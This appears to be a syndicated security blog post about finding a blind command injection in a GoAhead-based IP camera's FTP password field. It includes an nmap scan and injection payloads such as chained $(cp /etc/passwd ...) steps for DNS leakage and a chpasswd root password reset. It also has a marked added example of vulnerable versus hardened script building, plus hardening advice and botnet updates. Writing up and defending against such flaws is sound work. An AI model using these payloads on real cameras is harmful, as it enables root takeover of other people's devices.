The obvious problems
PORT STATE SERVICE VERSION
23/tcp open telnet BusyBox telnetd
81/tcp open http GoAhead-Webs httpd
| HTTP/1.1 401 Unauthorized
|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open tcpwrapped
The double blind command injection
or cleaned up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
Following are some examples of my desperate attempts to get shell access. This is also the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`) ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device … nor netcat or bash …
But after spending way too much time without progress, I finally found the password to Open Sesame.
Now, logging in via telnet
(none) login: root
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
Woot woot 🙂 I quickly noticed the root of the command injection problem:
# cat /tmp/ftpupdate.sh
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
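Why a `$(...)` in the FTP password field ends up running as root, and what the step that writes ftpupdate.sh would have to do instead, as an added example that is not the post's or the camera vendor's code. It assumes the camera builds the upload script by pasting the configured FTP credentials into an unquoted shell heredoc that feeds the ftp client (the post shows the resulting file, not how it is run); the host, user and marker payload are constructed sample values.

```python
# Added example (not the post's or the vendor's code). Assumed mechanism: the
# camera pastes the FTP credentials into an unquoted shell heredoc for ftp.
import re
import subprocess

# Constructed sample values; the post's real payload was
# $(echo 'root:passwd'|chpasswd), which reset the root password.
HOST, USER, REMOTE_NAME = "ftp.site.com", "ftpuser", "remote.jpg"
PAYLOAD = "$(echo INJECTED)"

# Whitespace, quotes, $, backticks and newlines are rejected outright: a
# newline would start a new ftp command, so escaping alone is not enough.
_SAFE_CRED = re.compile(r"^[A-Za-z0-9._@%+=-]{1,64}$")

def _script(password, client, quoted_delim):
    delim = "'EOF'" if quoted_delim else "EOF"
    return (f"{client} <<{delim}\n"
            f"open {HOST} 21\n"
            f"user {USER} {password}\n"
            f"put 12.jpg {REMOTE_NAME}\n"
            "EOF\n")

def build_script_vulnerable(password, client="ftp -n"):
    # Unquoted delimiter: sh expands $(...) and `...` inside the heredoc
    # before the ftp client reads a single line. That is the RCE.
    return _script(password, client, quoted_delim=False)

def build_script_hardened(password, client="ftp -n"):
    # Two layers: reject values the ftp line syntax cannot carry safely,
    # and quote the delimiter so the shell never expands the heredoc body.
    if not _SAFE_CRED.match(password):
        raise ValueError("FTP password contains disallowed characters")
    return _script(password, client, quoted_delim=True)

def what_the_client_sees(script):
    # Run the script under /bin/sh with 'cat' standing in for the ftp
    # client; the output is exactly what the client would have received.
    out = subprocess.run(["/bin/sh"], input=script, capture_output=True,
                         text=True, check=True)
    return out.stdout

def demo():
    vuln = what_the_client_sees(build_script_vulnerable(PAYLOAD, "cat"))
    literal = what_the_client_sees(_script(PAYLOAD, "cat", quoted_delim=True))
    try:
        build_script_hardened(PAYLOAD, "cat")
        rejected = False
    except ValueError:
        rejected = True
    safe = what_the_client_sees(build_script_hardened("s3cret", "cat"))
    return vuln, literal, rejected, safe
```

In the vulnerable form the client receives `user ftpuser INJECTED`, i.e. the command already ran; with the quoted delimiter it receives the `$(...)` as literal text, and the input check rejects it before a script is written at all.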
My hardening list
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
You can use OpenVPN to connect into your home network, and access the web interface of the camera. It works from Android, iOS, and any desktop OS.
My TODO list
- Investigate the script /system/system/bin/gmail_thread
- Investigate the cloud protocol * – see update 2016 10 27
- Buy a Raspberry Pi, integrate it with a good USB camera, and watch this IP camera burn
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 – ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: “Because of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability.” https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above) and my command injection exploit were combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper: “The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously.”
This issue might be worse than the Mirai worm, because this affects cameras and other IoT devices behind NAT where UPnP was enabled.
This is a Security Bloggers Network syndicated blog post authored by Z. Read the original post at: Jump ESP, jump!